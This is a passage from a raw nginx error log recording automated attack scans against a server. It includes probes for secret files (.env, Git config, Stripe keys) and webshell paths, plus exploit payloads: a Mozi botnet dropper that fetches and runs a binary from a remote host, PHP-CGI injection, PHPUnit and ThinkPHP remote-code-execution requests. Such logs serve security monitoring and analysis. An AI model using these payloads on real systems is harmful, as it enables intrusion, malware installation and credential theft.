45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.terraform/stripe.tfstate HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/config/s3_config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/s3_config.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.github/secrets/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/secrets/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.gitlab/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.gitlab-ci/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab-ci/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.circleci/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/stripe.keys" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/stripe.keys HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/keys/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/keys/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/secrets/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/secrets/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:39:27 [error] 343#343: *210761 open() "/var/www/html/.env" failed (2: No such file or directory), client: 143.198.233.138, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:39:27 [error] 343#343: *210762 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 143.198.233.138, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/16 15:52:53 [error] 344#344: *210802 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 204.76.203.20, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 16:17:41 [error] 344#344: *210808 open() "/var/www/html/shell" failed (2: No such file or directory), client: 14.205.104.200, server: localhost-nginx-proxy-manager, request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://14.205.104.200:55747/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 16:18:38 [error] 344#344: *210809 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:38 [error] 344#344: *210809 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:38 [error] 344#344: *210809 open() "/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:38 [error] 344#344: *210809 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:39 [error] 344#344: *210809 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:40 [error] 344#344: *210809 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/wp-admin/zwso.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:41 [error] 344#344: *210809 open() "/var/www/html/wp-content/plugins/hellopress/wp_mna.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/shlo.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /shlo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/133.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /133.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/php8.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /php8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:42 [error] 344#344: *210809 open() "/var/www/html/lufix1.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /lufix1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/witmm.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /witmm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/wp-admin/css/index.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:43 [error] 344#344: *210809 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/wp-editor.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/txets.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/wp-content/txets.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/wp-admin/txets.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:44 [error] 344#344: *210809 open() "/var/www/html/postnews.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:45 [error] 344#344: *210809 open() "/var/www/html/wp-content/postnews.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-content/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:18:45 [error] 344#344: *210809 open() "/var/www/html/wp-admin/postnews.php" failed (2: No such file or directory), client: 104.28.235.58, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 16:54:56 [error] 351#351: *210815 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 17:00:36 [error] 349#349: *210819 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:36 [error] 349#349: *210819 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:37 [error] 349#349: *210819 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:37 [error] 349#349: *210819 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:37 [error] 349#349: *210819 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:38 [error] 349#349: *210819 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:38 [error] 349#349: *210819 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:38 [error] 349#349: *210819 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:38 [error] 349#349: *210819 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:39 [error] 349#349: *210819 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:39 [error] 349#349: *210819 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:39 [error] 349#349: *210819 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:40 [error] 349#349: *210819 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:40 [error] 349#349: *210819 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:40 [error] 349#349: *210819 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:40 [error] 349#349: *210819 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:41 [error] 349#349: *210819 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:41 [error] 349#349: *210819 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:41 [error] 349#349: *210819 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:42 [error] 349#349: *210819 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:42 [error] 349#349: *210819 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:42 [error] 349#349: *210819 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:43 [error] 349#349: *210819 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:43 [error] 349#349: *210819 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:43 [error] 349#349: *210819 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:44 [error] 349#349: *210819 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:44 [error] 349#349: *210819 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:44 [error] 349#349: *210819 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:45 [error] 349#349: *210819 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:45 [error] 349#349: *210819 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:45 [error] 349#349: *210819 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:45 [error] 349#349: *210819 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:46 [error] 349#349: *210819 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:46 [error] 349#349: *210819 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:46 [error] 349#349: *210819 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:47 [error] 349#349: *210819 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:47 [error] 349#349: *210819 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:47 [error] 349#349: *210819 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:47 [error] 349#349: *210819 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:48 [error] 349#349: *210819 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:00:48 [error] 349#349: *210819 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 106.54.176.158, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:40:12 [error] 349#349: *210835 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 17:46:10 [error] 349#349: *210836 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 193.142.147.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 18:17:58 [error] 350#350: *210851 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:17:58 [error] 350#350: *210852 open() "/var/www/html/.env.pgsql" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.pgsql HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:17:58 [error] 350#350: *210853 open() "/var/www/html/.env-event" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-event HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:17:58 [error] 350#350: *210854 open() "/var/www/html/.env-usage" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-usage HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:17:59 [error] 350#350: *210855 open() "/var/www/html/.env.bak.1" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.bak.1 HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:17:59 [error] 350#350: *210856 open() "/var/www/html/.env.cache" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.cache HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:00 [error] 350#350: *210857 open() "/var/www/html/.env.netrc" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.netrc HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:00 [error] 350#350: *210858 open() "/var/www/html/.env.old.1" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.old.1 HTTP/1.1", host: "92.249.249.197" +2026/01/16 